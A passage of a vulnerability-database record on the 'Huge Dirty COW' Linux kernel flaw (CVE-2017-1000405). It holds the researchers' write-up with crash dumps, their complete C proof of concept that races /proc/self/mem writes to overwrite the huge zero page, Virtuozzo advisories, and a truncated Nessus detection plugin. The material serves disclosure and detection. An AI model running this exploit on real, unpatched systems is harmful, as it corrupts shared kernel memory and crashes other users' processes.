of the copied version of the page, we have to fault the original page twice\u200a\u2014\u200afirst to make it present, and then to turn on the dirty bit.\r\n\r\nNow comes the inevitable question\u200a\u2014\u200ahow bad is this?\r\n\r\n### Bug implications\r\nIn order to exploit the bug, we have to choose an interesting read-only huge page as a target for the writing. The only constraint is that we need to be able to fetch it after it\u2019s discarded with `madvise(MADV_DONTNEED)`.\r\nAnonymous huge pages that were inherited from a parent process after a `fork` are a valuable target, however once they are discarded they are lost for good\u200a\u2014\u200awe can\u2019t fetch them again.\r\n\r\nWe found two interesting targets that should not be written into:\r\n* The huge zero page\r\n* Sealed (read-only) huge pages\r\n\r\n### The zero page\r\nWhen issuing a read fault on an anonymous mapping before it was ever written, we get a special physical page called the zero page. This optimization prevents the system from having to allocate multiple zeroed out pages in the system, which might never be written to. Thus, the exact same zero page is mapped in many different processes, which have different security levels.\r\n\r\nThe same principle applies to huge pages as well\u200a\u2014\u200athere\u2019s no need to create another huge page if no write fault has occurred yet\u200a\u2014\u200aa special page called the huge zero page will be mapped, instead. Note that this feature can be turned off as well.\r\n\r\n### THP, shmem and sealed files\r\nshmem and [tmpfs](https://medium.com/r/?url=https%3A%2F%2Fwww.kernel.org%2Fdoc%2FDocumentation%2Ffilesystems%2Ftmpfs.txt) files can be mapped using THP as well. shmem files can be created using the [memfd_create](https://medium.com/r/?url=http%3A%2F%2Fman7.org%2Flinux%2Fman-pages%2Fman2%2Fmemfd_create.2.html) syscall, or by mmaping anonymous shared mappings. tmpfs files can be created using the mount point of the tmpfs (usually `/dev/shm`). Both can be mapped with huge pages, depending on the system configuration.\r\n\r\nshmem files can be sealed\u200a\u2014\u200asealing a file restricts the set of operations allowed on the file in question. This mechanism allows processes that don\u2019t trust each other to communicate via shared memory without having to take extra measures to deal with unexpected manipulations of the shared memory region (see `man memfd_create()` for more info). Three types of seals exist -\r\n* `F_SEAL_SHRINK`: file size cannot be reduced\r\n* `F_SEAL_GROW`: file size cannot be increased\r\n* `F_SEAL_WRITE`: file content cannot be modified\r\n\r\nThese seals can be added to the shmem file using the `fcntl` syscall.\r\n\r\n### POC\r\nOur POC demonstrates overwriting the huge zero page. Overwriting shmem should be equally possible and would lead to an alternative exploit path.\r\n\r\nNote that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) THP. Using this primitive, we successfully crash several processes. A likely consequence of overwriting the huge zero page is having improper initial values inside large BSS sections. A common vulnerable pattern would be using the zero value as an indicator that a global variable hasn\u2019t been initialized yet.\r\n\r\nThe following crash example demonstrates that pattern. In this example, the JS Helper thread of Firefox makes a `NULL`-deref, probably because the boolean pointed by `%rdx` erroneously says the object was initialized:\r\n```\r\nThread 10 \"JS Helper\" received signal SIGSEGV, Segmentation fault.\r\n[Switching to Thread 0x7fffe2aee700 (LWP 14775)]\r\n0x00007ffff13233d3 in ?? () from /opt/firefox/libxul.so\r\n(gdb) i r\r\nrax 0x7fffba7ef080 140736322269312\r\nrbx 0x0 0\r\nrcx 0x22 34\r\nrdx 0x7fffba7ef080 140736322269312\r\nrsi 0x400000000 17179869184\r\nrdi 0x7fffe2aede10 140736996498960\r\nrbp 0x0 0x0\r\nrsp 0x7fffe2aede10 0x7fffe2aede10\r\nr8 0x20000 131072\r\nr9 0x7fffba900000 140736323387392\r\nr10 0x7fffba700000 140736321290240\r\nr11 0x7fffe2aede50 140736996499024\r\nr12 0x1 1\r\nr13 0x7fffba7ef090 140736322269328\r\nr14 0x2 2\r\nr15 0x7fffe2aee700 140736996501248\r\nrip 0x7ffff13233d3 0x7ffff13233d3\r\neflags 0x10246 [ PF ZF IF RF ]\r\ncs 0x33 51\r\nss 0x2b 43\r\nds 0x0 0\r\nes 0x0 0\r\nfs 0x0 0\r\ngs 0x0 0\r\n(gdb) x/10i $pc-0x10\r\n 0x7ffff13233c3: mov %rax,0x10(%rsp)\r\n 0x7ffff13233c8: mov 0x8(%rdx),%rbx\r\n 0x7ffff13233cc: mov %rbx,%rbp\r\n 0x7ffff13233cf: and $0xfffffffffffffffe,%rbp\r\n=> 0x7ffff13233d3: mov 0x0(%rbp),%eax\r\n 0x7ffff13233d6: and $0x28,%eax\r\n 0x7ffff13233d9: cmp $0x28,%eax\r\n 0x7ffff13233dc: je 0x7ffff1323440\r\n 0x7ffff13233de: mov %rbx,%r13\r\n 0x7ffff13233e1: and $0xfffffffffff00000,%r13\r\n(gdb) x/10w $rdx\r\n0x7fffba7ef080: 0x41414141 0x00000000 0x00000000 0x00000000\r\n0x7fffba7ef090: 0xeef93bba 0x00000000 0xda95dd80 0x00007fff\r\n0x7fffba7ef0a0: 0x778513f1 0x00000000\r\n```\r\n\r\nThis is another crash example\u200a\u2014\u200agdb crashes while loading the symbols for a Firefox debugging session:\r\n```\r\n(gdb) r\r\nStarting program: /opt/firefox/firefox \r\n[Thread debugging using libthread_db enabled]\r\nUsing host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n(gdb) i s\r\n#0 0x0000555555825487 in eq_demangled_name_entry (a=0x4141414141414141, b=<optimized out>) at symtab.c:697\r\n#1 0x0000555555955203 in htab_find_slot_with_hash (htab=0x555557008e60, element=element@entry=0x7fffffffdb00, hash=4181413748, insert=insert@entry=INSERT) at ./hashtab.c:659\r\n#2 0x0000555555955386 in htab_find_slot (htab=<optimized out>, element=element@entry=0x7fffffffdb00, insert=insert@entry=INSERT) at ./hashtab.c:703\r\n#3 0x00005555558273e5 in symbol_set_names (gsymbol=gsymbol@entry=0x5555595b3778, linkage_name=linkage_name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", len=len@entry=48, \r\n copy_name=copy_name@entry=0, objfile=<optimized out>) at symtab.c:818\r\n#4 0x00005555557d186f in minimal_symbol_reader::record_full (this=0x7fffffffdce0, this@entry=0x1768bd6, name=<optimized out>, \r\n name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=48, address=24546262, ms_type=ms_type@entry=mst_file_text, \r\n section=13) at minsyms.c:1010\r\n#5 0x00005555556959ec in record_minimal_symbol (reader=..., name=name@entry=0x7ffff2ac5254 \"_ZN7mozilla3dom16HTMLTableElement11CreateTHeadEv\", name_len=<optimized out>, copy_name=copy_name@entry=false, \r\n address=<optimized out>, address@entry=24546262, ms_type=ms_type@entry=mst_file_text, bfd_section=<optimized out>, objfile=0x555557077860) at elfread.c:209\r\n#6 0x0000555555696ac6 in elf_symtab_read (reader=..., objfile=objfile@entry=0x555557077860, type=type@entry=0, number_of_symbols=number_of_symbols@entry=365691, \r\n symbol_table=symbol_table@entry=0x7ffff6a6d020, copy_names=copy_names@entry=false) at elfread.c:462\r\n#7 0x00005555556970c4 in elf_read_minimal_symbols (symfile_flags=<optimized out>, ei=0x7fffffffdcd0, objfile=0x555557077860) at elfread.c:1084\r\n#8 elf_symfile_read (objfile=0x555557077860, symfile_flags=...) at elfread.c:1194\r\n#9 0x000055555581f559 in read_symbols (objfile=objfile@entry=0x555557077860, add_flags=...) at symfile.c:861\r\n#10 0x000055555581f00b in syms_from_objfile_1 (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1062\r\n#11 syms_from_objfile (add_flags=..., addrs=0x555557101b00, objfile=0x555557077860) at symfile.c:1078\r\n#12 symbol_file_add_with_addrs (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., parent=parent@entry=0x0)\r\n at symfile.c:1177\r\n#13 0x000055555581f63d in symbol_file_add_from_bfd (abfd=<optimized out>, name=name@entry=0x55555738c1d0 \"/opt/firefox/libxul.so\", add_flags=..., addrs=addrs@entry=0x555557101b00, flags=..., \r\n parent=parent@entry=0x0) at symfile.c:1268\r\n#14 0x000055555580b256 in solib_read_symbols (so=so@entry=0x55555738bfc0, flags=...) at solib.c:712\r\n#15 0x000055555580be9b in solib_add (pattern=pattern@entry=0x0, from_tty=from_tty@entry=0, readsyms=1) at solib.c:1016\r\n#16 0x000055555580c678 in handle_solib_event () at solib.c:1301\r\n#17 0x00005555556f9db4 in bpstat_stop_status (aspace=0x555555ff5670, bp_addr=bp_addr@entry=140737351961185, ptid=..., ws=ws@entry=0x7fffffffe1d0) at breakpoint.c:5712\r\n#18 0x00005555557ad1ef in handle_signal_stop (ecs=0x7fffffffe1b0) at infrun.c:5963\r\n#19 0x00005555557aec8a in handle_inferior_event_1 (ecs=0x7fffffffe1b0) at infrun.c:5392\r\n#20 handle_inferior_event (ecs=ecs@entry=0x7fffffffe1b0) at infrun.c:5427\r\n#21 0x00005555557afd57 in fetch_inferior_event (client_data=<optimized out>) at infrun.c:3932\r\n#22 0x000055555576ade5 in gdb_wait_for_event (block=block@entry=0) at event-loop.c:859\r\n#23 0x000055555576aef7 in gdb_do_one_event () at event-loop.c:322\r\n#24 0x000055555576b095 in gdb_do_one_event () at ./common/common-exceptions.h:221\r\n#25 start_event_loop () at event-loop.c:371\r\n#26 0x00005555557c3938 in captured_command_loop (data=data@entry=0x0) at main.c:325\r\n#27 0x000055555576d243 in catch_errors (func=func@entry=0x5555557c3910 <captured_command_loop(void*)>, func_args=func_args@entry=0x0, errstring=errstring@entry=0x555555a035da \"\", \r\n mask=mask@entry=RETURN_MASK_ALL) at exceptions.c:236\r\n#28 0x00005555557c49ae in captured_main (data=<optimized out>) at main.c:1150\r\n#29 gdb_main (args=<optimized out>) at main.c:1160\r\n#30 0x00005555555ed628 in main (argc=<optimized out>, argv=<optimized out>) at gdb.c:32\r\n(gdb) list\r\n692 const struct demangled_name_entry *da\r\n693 = (const struct demangled_name_entry *) a;\r\n694 const struct demangled_name_entry *db\r\n695 = (const struct demangled_name_entry *) b;\r\n696 \r\n697 return strcmp (da->mangled, db->mangled) == 0;\r\n698 }\r\n699 \r\n700 /* Create the hash table used for demangled names. Each hash entry is\r\n701 a pair of strings; one for the mangled name and one for the demangled\r\n(gdb)\r\n```\r\n\r\nLink to our [POC](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Fbindecy%2FHugeDirtyCowPOC)\r\n\r\n### Summary\r\nThis bug demonstrates the importance of patch auditing in the security development life-cycle. As the Dirty COW case and other [past cases](https://medium.com/r/?url=https%3A%2F%2Fsektioneins.de%2Fblog%2F16-09-05-pegasus-ios-kernel-vulnerability-explained-part-2.html) show, even hyped vulnerabilities may get incomplete patches. The situation is not reserved for closed source software only; open source software suffers just as much.\r\n\r\nFeel free to comment with any question or idea about the issue \r\n\r\n### Disclosure timeline\r\nThe initial report was on the 22.11.17 to the kernel and distros mailing lists. The response was immediate and professional with a [patch](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Ftorvalds%2Flinux%2Fcommit%2Fa8f97366452ed491d13cf1e44241bc0b5740b1f0) ready in a few days. The patch fixes the touch_pmd function to set the dirty bit of the PMD entry only when the caller asks for write access.\r\n\r\nThanks to the Security team and the distros for their time and effort of maintaining a high standard of security.\r\n\r\n* 22.11.17\u200a\u2014\u200aInitial report to security@kernel.org and linux-distros@vs.openwall.org\r\n* 22.11.17\u200a\u2014\u200aCVE-2017\u20131000405 was assigned\r\n* 27.11.17\u200a\u2014\u200aPatch was committed to mainline kernel\r\n* 29.11.17\u200a\u2014\u200aPublic announcement", "published": "2017-11-30T00:00:00", "type": "seebug", "title": "\"Huge Dirty COW\" (CVE-2017\u20131000405)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2017-11-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96908", "id": "SSV:96908", "sourceData": "\n //\r\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. \r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96908", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:27:45", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernel 3.10.0-693.1.1.vz7.37.30 (Virtuozzo 7.0.6).\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n**Vulnerability id:** CVE-2017-1000407\nA vulnerability was found in the kernel virtualization module (KVM) for the Intel processors. A guest system could flood the I/O port 0x80 with write requests, which could crash the host kernel, resulting in DoS.\n\n", "edition": 1, "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "VZA-2017-111", "href": "https://help.virtuozzo.com/customer/portal/articles/2909951", "title": "Important kernel update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 39.1 for Virtuozzo 7.0.6", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:06", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernel 3.10.0-514.26.1.vz7.33.22 (Virtuozzo 7.0.5).\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n**Vulnerability id:** CVE-2017-1000407\nA vulnerability was found in the kernel virtualization module (KVM) for the Intel processors. A guest system could flood the I/O port 0x80 with write requests, which could crash the host kernel, resulting in DoS.\n\n", "edition": 1, "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "VZA-2017-110", "href": "https://help.virtuozzo.com/customer/portal/articles/2909950", "title": "Important kernel update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 39.1 for Virtuozzo 7.0.5", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:09", "bulletinFamily": "unix", "cvelist": ["CVE-2017-8824", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4) and 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3)\n**Vulnerability id:** CVE-2017-8824\ndccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n", "edition": 1, "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "VZA-2017-109", "href": "https://help.virtuozzo.com/customer/portal/articles/2909949", "title": "Important kernel update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 39.2 for Virtuozzo 7.0.4 and 7.0.4 HF3", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:19", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15129", "CVE-2017-8824", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-18017", "CVE-2017-1000405"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.42.0.vz7.18.7 (Virtuozzo 7.0.1), and 3.10.0-327.42.0.vz7.20.18 (Virtuozzo 7.0.3).\n**Vulnerability id:** CVE-2017-8824\nA vulnerability was found in DCCP socket handling code. dccp_disconnect() set the socket state to DCCP_CLOSED but did not properly free some of the resources associated with that socket. This could result in a use-after-free and could potentially allow an attacker to escalate their privileges.\n\n**Vulnerability id:** CVE-2017-16939\nThe Linux kernel is vulnerable to a use-after-free issue. It could occur while closing a xfrm netlink socket, in xfrm_dump_policy_done. A user/process could use this flaw to potentially escalate their privileges on a system.\n\n**Vulnerability id:** CVE-2017-15129\nThe function get_net_ns_by_id() does not check the net.count value when processing a peer network, which could lead to double free and memory corruption. An unprivileged local user could use this vulnerability to crash the system.\n\n**Vulnerability id:** CVE-2017-18017\nIf the system uses iptables and there are iptables rules with TCPMSS action there, a remote attacker could cause a denial of service (use-after-free in tcpmss_mangle_packet function leading to memory corruption) or possibly have unspecified other impact by sending specially crafted network packets.\n\n**Vulnerability id:** CVE-2017-1000405\nA flaw was found in the patches used to fix the 'Dirty COW' vulnerability (CVE-2016-5195). An attacker, able to run local code, could exploit a race condition in transparent huge pages to modify usually read-only huge pages.\n\n", "edition": 1, "modified": "2018-01-12T00:00:00", "published": "2018-01-12T00:00:00", "id": "VZA-2018-004", "href": "https://help.virtuozzo.com/customer/portal/articles/2915392", "title": "Important kernel security update: CVE-2017-8824 and other; Virtuozzo ReadyKernel patch 42.0 for Virtuozzo 7.0.0, 7.0.1, and 7.0.3", "type": "virtuozzo", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T09:13:20", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-12T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-111)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "modified": "2017-12-12T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-111.NASL", "href": "https://www.tenable.com/plugins/nessus/105167", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105167);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-1000407\",\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-111)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2909951\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-37.30-39.1-2.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?25634872\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 